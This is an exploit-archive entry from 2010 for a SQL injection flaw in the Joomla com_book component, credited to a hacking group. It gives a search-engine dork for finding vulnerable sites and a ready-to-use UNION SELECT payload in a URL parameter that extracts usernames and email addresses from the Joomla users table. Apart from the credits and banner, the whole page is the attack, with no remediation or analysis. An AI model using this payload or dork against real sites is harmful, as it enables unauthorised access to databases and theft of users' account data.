[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Joomla Component com_book SQL injection Vulnerability
# Published : 2010-01-21
# Author : Evil-Cod3r
# Previous Title : eWebeditor Directory Traversal
# Next Title : SHOUTcast Server Version <= 1.9.8/win32 CSRF Vulnerability


==============================================================================
                      _      _       _          _      _   _ 
                     /     | |     | |        /     | | | |
                    / _    | |     | |       / _    | |_| |
                   / ___   | |___  | |___   / ___   |  _  |
   IN THE NAME OF /_/   _ |_____| |_____| /_/   _ |_| |_|
                                                             

==============================================================================
        [?] ~ Note : : <3 v4sploiter
==============================================================================
        [?] Joomla (com_book) SQL injection Vulnerability 
==============================================================================

	[?] Script:             [ Joomla Comp ]
	[?] Language:           [ PHP ]
    [?] Dork:               [ inurl:"com_book" ]
	[?] Founder:            [ Evil-Cod3r ]
    [?] Gr44tz:             [ v4sploiter - Mr.SaFa7 - Red Virus - Mn7os - Recruit ='( ]
    [?] Team:               [ v4-Team.com/cc ]
    [?] Price:              [ Free ]
###########################################################################

http://localhost/path/index.php?option=com_book&controller=listtour&task=showTour&cid[]=Exploit

 Exploit : -

index.php?option=com_book&controller=listtour&task=showTour&cid[]=-1 union all select 1,concat(username,0x3a,email),3,4,5,6,7,8,9,10 from jos_users-- 


Author: Evil-Cod3r

###########################################################################